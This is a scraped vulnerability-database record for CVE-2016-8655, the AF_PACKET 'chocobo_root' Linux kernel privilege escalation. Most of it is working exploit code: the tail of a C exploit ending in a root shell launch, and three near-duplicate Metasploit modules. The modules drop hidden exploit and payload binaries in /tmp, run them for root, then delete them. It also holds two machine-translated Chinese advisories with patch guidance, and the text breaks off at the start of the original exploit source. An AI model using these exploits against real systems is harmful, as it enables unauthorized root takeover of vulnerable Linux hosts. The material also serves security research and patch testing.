hardware\\n\");\r\n check_procs();\r\n dprintf(\"[~] done, hardware looks good\\n\");\r\n\r\n dprintf(\"[.] checking kernel version\\n\");\r\n detect_versions();\r\n dprintf(\"[~] done, version looks good\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n dprintf(\"[.] KASLR bypass enabled, getting kernel base address\\n\");\r\n KERNEL_BASE = get_kernel_addr();\r\n dprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n dprintf(\"[.] proc_dostring: %lx\\n\", PROC_DOSTRING);\r\n dprintf(\"[.] modprobe_path: %lx\\n\", MODPROBE_PATH);\r\n dprintf(\"[.] register_sysctl_table: %lx\\n\", REGISTER_SYSCTL_TABLE);\r\n dprintf(\"[.] set_memory_rw: %lx\\n\", SET_MEMORY_RW);\r\n\r\n pid = fork();\r\n if (pid == 0) {\r\n dprintf(\"[.] setting up namespace sandbox\\n\");\r\n setup_sandbox();\r\n dprintf(\"[~] done, namespace sandbox set up\\n\");\r\n wrapper();\r\n exit(0);\r\n }\r\n\r\n waitpid(pid, &status, 0);\r\n\r\n launch_rootshell();\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47170"}, {"lastseen": "2018-05-24T14:24:04", "description": "Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit). CVE-2016-8655. Local exploit for Linux platform. Tags: Metasploit Frame...", "published": "2018-05-22T00:00:00", "type": "exploitdb", "title": "Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-05-22T00:00:00", "id": "EDB-ID:44696", "href": "https://www.exploit-db.com/exploits/44696/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a race condition and use-after-free in the\r\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\r\n the Linux kernel to execute code as root (CVE-2016-8655).\r\n\r\n The bug was initially introduced in 2011 and patched in 2016 in version\r\n 4.4.0-53.74, potentially affecting a large number of kernels; however\r\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\r\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\r\n Linux Mint.\r\n\r\n The target system must have unprivileged user namespaces enabled and\r\n two or more CPU cores.\r\n\r\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\r\n may crash the kernel.\r\n\r\n This module has been tested successfully on Linux Mint 17.3 (x86_64);\r\n Linux Mint 18 (x86_64); and Ubuntu 16.04.2 (x86_64) with kernel\r\n versions 4.4.0-45-generic and 4.4.0-51-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'rebel', # Discovery and chocobo_root.c exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Aug 12 2016',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'AKA', 'chocobo_root.c' ],\r\n [ 'EDB', '40871' ],\r\n [ 'CVE', '2016-8655' ],\r\n [ 'BID', '94692' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/607' ],\r\n [ 'URL', 'http://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\r\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\r\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\r\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\r\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\r\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n\r\n def timeout\r\n datastore['TIMEOUT'].to_i\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c -lpthread\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n rm_f \"#{path}.c\"\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n\r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'CVE-2016-8655', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n version = kernel_release\r\n unless version =~ /^4\\.4\\.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic/\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} is vulnerable\"\r\n\r\n arch = kernel_hardware\r\n unless arch.include? 'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n cores = get_cpu_info[:cores].to_i\r\n min_required_cores = 2\r\n unless cores >= min_required_cores\r\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System has #{cores} CPU cores\"\r\n\r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if check != CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('chocobo_root.c')\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('chocobo_root')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status \"Launching exploit (Timeout: #{timeout})...\"\r\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\r\n rm_f executable_path\r\n rm_f payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44696/"}], "metasploit": [{"lastseen": "2020-10-13T19:41:37", "description": "This module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled, two or more CPU cores, and SMAP must be disabled. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); Ubuntu 16.04 (x86_64); and Ubuntu 16.04.2 (x86_64).\n", "published": "2018-05-07T07:11:07", "type": "metasploit", "title": "AF_PACKET chocobo_root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\n 'Description' => %q{\n This module exploits a race condition and use-after-free in the\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n the Linux kernel to execute code as root (CVE-2016-8655).\n\n The bug was initially introduced in 2011 and patched in 2016 in version\n 4.4.0-53.74, potentially affecting a large number of kernels; however\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n Linux Mint.\n\n The target system must have unprivileged user namespaces enabled,\n two or more CPU cores, and SMAP must be disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on\n\n Linux Mint 17.3 (x86_64);\n Linux Mint 18 (x86_64);\n Ubuntu 16.04 (x86_64); and\n Ubuntu 16.04.2 (x86_64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rebel', # Discovery and chocobo_root.c exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2016-08-12',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '40871' ],\n [ 'CVE', '2016-8655' ],\n [ 'BID', '94692' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/607' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\n ],\n 'Notes' =>\n {\n 'AKA' => ['chocobo_root.c'],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ]\n },\n 'DefaultTarget' => 0\n ))\n register_options [\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def timeout\n datastore['TIMEOUT'].to_i\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n return CheckCode::Safe(\"System architecture #{arch} is not supported\")\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n offsets = strip_comments(exploit_data('CVE-2016-8655', 'chocobo_root.c')).scan(/kernels\\[\\] = \\{(.+?)\\};/m).flatten.first\n kernels = offsets.scan(/\"(.+?)\"/).flatten\n\n version = \"#{kernel_release} #{kernel_version.split(' ').first}\"\n unless kernels.include? version\n return CheckCode::Safe(\"Linux kernel #{version} is not vulnerable\")\n end\n vprint_good \"Linux kernel #{version} is vulnerable\"\n\n if smap_enabled?\n return CheckCode::Safe('SMAP is enabled')\n end\n vprint_good 'SMAP is not enabled'\n\n if lkrg_installed?\n return CheckCode::Safe('LKRG is installed')\n end\n vprint_good 'LKRG is not installed'\n\n if grsec_installed?\n return CheckCode::Safe('grsecurity is in use')\n end\n vprint_good 'grsecurity is not in use'\n\n cores = get_cpu_info[:cores].to_i\n min_required_cores = 2\n unless cores >= min_required_cores\n return CheckCode::Safe(\"System has less than #{min_required_cores} CPU cores\")\n end\n vprint_good \"System has #{cores} CPU cores\"\n\n config = kernel_config\n if config.nil?\n return CheckCode::Unknown('Could not retrieve kernel config')\n end\n\n unless config.include? 'CONFIG_USER_NS=y'\n return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS')\n end\n vprint_good 'Kernel config has CONFIG_USER_NS enabled'\n\n unless userns_enabled?\n return CheckCode::Safe('Unprivileged user namespaces are not permitted')\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, exploit_data('CVE-2016-8655', 'chocobo_root.c'), '-lpthread'\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('CVE-2016-8655', 'chocobo_root')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n print_status \"Launching exploit (Timeout: #{timeout})...\"\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\n rm_f executable_path\n rm_f payload_path\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb"}, {"lastseen": "2020-12-30T06:54:57", "description": "This module exploits a race condition and use-after-free in the packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel to execute code as root (CVE-2016-8655). The bug was initially introduced in 2011 and patched in 2016 in version 4.4.0-53.74, potentially affecting a large number of kernels; however this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as Linux Mint. The target system must have unprivileged user namespaces enabled, two or more CPU cores, and SMAP must be disabled. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on Linux Mint 17.3 (x86_64); Linux Mint 18 (x86_64); Ubuntu 16.04 (x86_64); and Ubuntu 16.04.2 (x86_64).\n", "published": "2018-05-07T07:11:07", "type": "metasploit", "title": "AF_PACKET chocobo_root Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/LOCAL/AF_PACKET_CHOCOBO_ROOT_PRIV_ESC/", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GoodRanking\n\n include Msf::Post::File\n include Msf::Post::Linux::Priv\n include Msf::Post::Linux::Compile\n include Msf::Post::Linux::System\n include Msf::Post::Linux::Kernel\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AF_PACKET chocobo_root Privilege Escalation',\n 'Description' => %q{\n This module exploits a race condition and use-after-free in the\n packet_set_ring function in net/packet/af_packet.c (AF_PACKET) in\n the Linux kernel to execute code as root (CVE-2016-8655).\n\n The bug was initially introduced in 2011 and patched in 2016 in version\n 4.4.0-53.74, potentially affecting a large number of kernels; however\n this exploit targets only systems using Ubuntu (Trusty / Xenial) kernels\n 4.4.0 < 4.4.0-53, including Linux distros based on Ubuntu, such as\n Linux Mint.\n\n The target system must have unprivileged user namespaces enabled,\n two or more CPU cores, and SMAP must be disabled.\n\n Bypasses for SMEP and KASLR are included. Failed exploitation\n may crash the kernel.\n\n This module has been tested successfully on\n\n Linux Mint 17.3 (x86_64);\n Linux Mint 18 (x86_64);\n Ubuntu 16.04 (x86_64); and\n Ubuntu 16.04.2 (x86_64).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rebel', # Discovery and chocobo_root.c exploit\n 'bcoles' # Metasploit\n ],\n 'DisclosureDate' => '2016-08-12',\n 'Platform' => [ 'linux' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\n 'Targets' => [[ 'Auto', {} ]],\n 'Privileged' => true,\n 'References' =>\n [\n [ 'EDB', '40871' ],\n [ 'CVE', '2016-8655' ],\n [ 'BID', '94692' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/607' ],\n [ 'URL', 'https://seclists.org/oss-sec/2016/q4/att-621/chocobo_root_c.bin' ],\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/master/CVE-2016-8655/chocobo_root.c' ],\n [ 'URL', 'https://bitbucket.org/externalist/1day_exploits/src/master/CVE-2016-8655/CVE-2016-8655_chocobo_root_commented.c' ],\n [ 'URL', 'https://usn.ubuntu.com/3151-1/' ],\n [ 'URL', 'https://www.securitytracker.com/id/1037403' ],\n [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=84ac7260236a49c79eede91617700174c2c19b0c' ]\n ],\n 'Notes' =>\n {\n 'AKA' => ['chocobo_root.c'],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'Stability' => [ CRASH_OS_DOWN ]\n },\n 'DefaultTarget' => 0\n ))\n register_options [\n OptInt.new('TIMEOUT', [ true, 'Race timeout (seconds)', '600' ]),\n ]\n register_advanced_options [\n OptBool.new('ForceExploit', [ false, 'Override check result', false ]),\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])\n ]\n end\n\n def timeout\n datastore['TIMEOUT'].to_i\n end\n\n def base_dir\n datastore['WritableDir'].to_s\n end\n\n def check\n arch = kernel_hardware\n unless arch.include? 'x86_64'\n return CheckCode::Safe(\"System architecture #{arch} is not supported\")\n end\n vprint_good \"System architecture #{arch} is supported\"\n\n offsets = strip_comments(exploit_data('CVE-2016-8655', 'chocobo_root.c')).scan(/kernels\\[\\] = \\{(.+?)\\};/m).flatten.first\n kernels = offsets.scan(/\"(.+?)\"/).flatten\n\n version = \"#{kernel_release} #{kernel_version.split(' ').first}\"\n unless kernels.include? version\n return CheckCode::Safe(\"Linux kernel #{version} is not vulnerable\")\n end\n vprint_good \"Linux kernel #{version} is vulnerable\"\n\n if smap_enabled?\n return CheckCode::Safe('SMAP is enabled')\n end\n vprint_good 'SMAP is not enabled'\n\n if lkrg_installed?\n return CheckCode::Safe('LKRG is installed')\n end\n vprint_good 'LKRG is not installed'\n\n if grsec_installed?\n return CheckCode::Safe('grsecurity is in use')\n end\n vprint_good 'grsecurity is not in use'\n\n cores = get_cpu_info[:cores].to_i\n min_required_cores = 2\n unless cores >= min_required_cores\n return CheckCode::Safe(\"System has less than #{min_required_cores} CPU cores\")\n end\n vprint_good \"System has #{cores} CPU cores\"\n\n config = kernel_config\n if config.nil?\n return CheckCode::Unknown('Could not retrieve kernel config')\n end\n\n unless config.include? 'CONFIG_USER_NS=y'\n return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS')\n end\n vprint_good 'Kernel config has CONFIG_USER_NS enabled'\n\n unless userns_enabled?\n return CheckCode::Safe('Unprivileged user namespaces are not permitted')\n end\n vprint_good 'Unprivileged user namespaces are permitted'\n\n CheckCode::Appears\n end\n\n def exploit\n unless check == CheckCode::Appears\n unless datastore['ForceExploit']\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n if is_root?\n unless datastore['ForceExploit']\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\n end\n end\n\n unless writable? base_dir\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\n end\n\n # Upload exploit executable\n executable_name = \".#{rand_text_alphanumeric(5..10)}\"\n executable_path = \"#{base_dir}/#{executable_name}\"\n if live_compile?\n vprint_status 'Live compiling exploit on system...'\n upload_and_compile executable_path, exploit_data('CVE-2016-8655', 'chocobo_root.c'), '-lpthread'\n else\n vprint_status 'Dropping pre-compiled exploit on system...'\n upload_and_chmodx executable_path, exploit_data('CVE-2016-8655', 'chocobo_root')\n end\n\n # Upload payload executable\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\"\n upload_and_chmodx payload_path, generate_payload_exe\n\n # Launch exploit\n print_status \"Launching exploit (Timeout: #{timeout})...\"\n output = cmd_exec \"echo '#{payload_path} & exit' | #{executable_path}\", nil, timeout\n output.each_line { |line| vprint_status line.chomp }\n print_status \"Cleaning up #{payload_path} and #{executable_path}..\"\n rm_f executable_path\n rm_f payload_path\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/af_packet_chocobo_root_priv_esc.rb"}], "myhack58": [{"lastseen": "2016-12-15T15:16:23", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655"], "edition": 1, "description": "Dear UCloud users:\n\nThe Linux kernel is proof of the presence of conditions of competition of high-risk vulnerabilities, exploit the vulnerability from low rights processes executing kernel code, harm the serious. Please check you are using the kernel is in the affected range, and timely upgrades.\n\n**Scope of impact**\n\ncentos 5 and 6 are not affected\ncentos 7 default is not affected by the impact of open namespaces after the affected\uff09 \nubuntu 12.04 14.04 affected\nDebian 7, and 8 affected\n\n**Solution**\n\nPlease make a backup of the work, in order to avoid a kernel repair after an accident situation\n1. A self-compiled fix, access repair code, download address: \nhttp://t.cn/RI7nIH3 \n2. Through the package Manager to download the update, after the update you need to restart to take effect: \n1\uff09centos7 upgrade methods: \nOfficial not yet released a Fix Pack\n2\uff09ubuntu: the \nsudo apt-get update \nsudo apt-get install linux-image-generic \nsudo reboot \nuname-a view system version for the following, the description of the upgrade success: \nubuntu 14.04 : 3.13.0-105.152 \nubuntu 12.04 : 3.2.0-118.161 \n3\uff09Debian: the \nThe official website is not yet published update package\n\n**Vulnerability details**\n\nCVE-2016-8655: Linux (net/packet/af_packet. c)the presence of conditions of competition vulnerability that can allow low-privileged process to obtain the kernel code to execute permission. Vulnerability as early as 2011(v3. 2-rc1)version are found in 2016 11 on v4. 9-rc8 version is fixed. \nPOC: the https://www.exploit-db.com/exploits/40871/\n", "modified": "2016-12-15T00:00:00", "published": "2016-12-15T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82103.htm", "id": "MYHACK58:62201682103", "type": "myhack58", "title": "UCloud-201612-002: Linux kernel through kill to mention the right vulnerability Security Alert-vulnerability warning-the black bar safety net", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-02-24T09:00:32", "bulletinFamily": "info", "cvelist": ["CVE-2016-8655", "CVE-2017-6074"], "edition": 1, "description": "Vulnerability number\nCVE-2017-6074 \nVulnerability overview\nThe Linux kernel recently also exposed a privilege escalation vulnerability that can be traced back to 2005, the vulnerabilities affect the Linux operating system major releases, including Redhat, Debian, OpenSUSE and Ubuntu. Using this vulnerability, an attacker can be from a low-rights process for kernel code execution. Currently known affected the old version is 2. 6. 18, 2006 9 months, but the vulnerability could in the previous version already exists, perhaps from the support DCCP begin in 2005 10 on the 2. 6. 14 it has been a problem. \nIn a Seclists. org the release of the vulnerability the author Andrey Konovalov said, will soon release a PoC, this is given during the repair time. \nSecurity researcher Andrey Konovalov recently with Syzkaller fuzzing tools, to discover the DCCP Protocol in the Linux kernel vulnerabilities, exploits the latent time for more than 10 years. \nDCCP Protocol \nDCCP Protocol is a message-oriented Transport Layer Protocol that can minimize packet header overhead and the terminal processing of the engineering amount. The Agreement may be the establishment, maintenance and removal of the unreliable connection of the data stream and unreliable stream congestion control. \nThe DCCP Double-free vulnerability allows local low privileged user to modify the Linux kernel memory, cause a denial of service system crash, or elevated, access the system management access permission. \nVulnerability details\nThis is a UAF vulnerability: in the IPV6_RECVPKTINFO open the case, the kernel parses the DCCP Protocol in the process the judge has received a DCCP_PKT_REQUEST the return package, it will release the parsing process using the SKB address. \u201cThe DCCP protocol implementation freed SKB (socket buffer) resources for a DCCP_PKT_REQUEST packet when the IPV6_RECVPKTINFO option is set on the socket.\u201d\uff09 \nAccording to the current implementation, the parsing DCCP Protocol process if dccp_v6_conn_request have a return value, it will by dccp_rcv_state_process in__kfree_skb freed the parsing process, the received DCCP_PKT_REQUEST return packet, the SKB address. However, if the IPV6_RECVPKTINFO open the case compile the kernel, the skb address will be stored in the ireq->pktopts, and dccp_v6_conn_request the reference count will increase, so the skb it will still be used. Until dccp_rcv_state_process process will be released. \nThe attacker uses some kernel heap spray technique will be able to control any object and use any of the data rewriting its contents. If you override the object contains any can trigger the function pointer, the attacker can be in the kernel to execute arbitrary code. \nThis vulnerability is not a remote code execution vulnerability, so an attacker must have the system local account to exploit the vulnerability. \nTwo months ago, the Linux kernel also exposed a similar to mention the right Vulnerability, CVE-2016-8655, the vulnerability can be traced back to 2011, the low-privileged local user using the Linux kernel af_packet implementation of the race condition, can get root access\n\nSolution\nThe manual repair: call consume_skb, rather than jump discard and call__kfree_skb\u3002 \n! [](/Article/UploadPic/2017-2/201722319322422. png? www. myhack58. com) \n\nA more detailed solution please click here. If you are an advanced Linux user, then you can apply the patch, rebuild the kernel, or wait for the Publisher to publish the update. \n\n", "modified": "2017-02-23T00:00:00", "published": "2017-02-23T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/83692.htm", "id": "MYHACK58:62201783692", "type": "myhack58", "title": "Lurking in 11 years of Linux kernel to mention the right vulnerability-exposure-vulnerability warning-the black bar safety net", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:28", "description": "\nLinux Kernel 4.4.0-21 4.4.0-51 (Ubuntu 14.0416.04 x86-64) - AF_PACKET Race Condition Privilege Escalation", "edition": 1, "published": "2018-12-29T00:00:00", "title": "Linux Kernel 4.4.0-21 4.4.0-51 (Ubuntu 14.0416.04 x86-64) - AF_PACKET Race Condition Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-8655"], "modified": "2018-12-29T00:00:00", "id": "EXPLOITPACK:D5BBB161063632A8D15C357D43E97C75", "href": "", "sourceData": "/*\nchocobo_root.c\nlinux AF_PACKET race condition exploit for CVE-2016-8655.\nIncludes KASLR and SMEP/SMAP bypasses.\nFor Ubuntu 14.04 / 16.04 (x86_64) kernels 4.4.0 before 4.4.0-53.74.\nAll kernel offsets have been tested on Ubuntu / Linux Mint.\n\nvroom 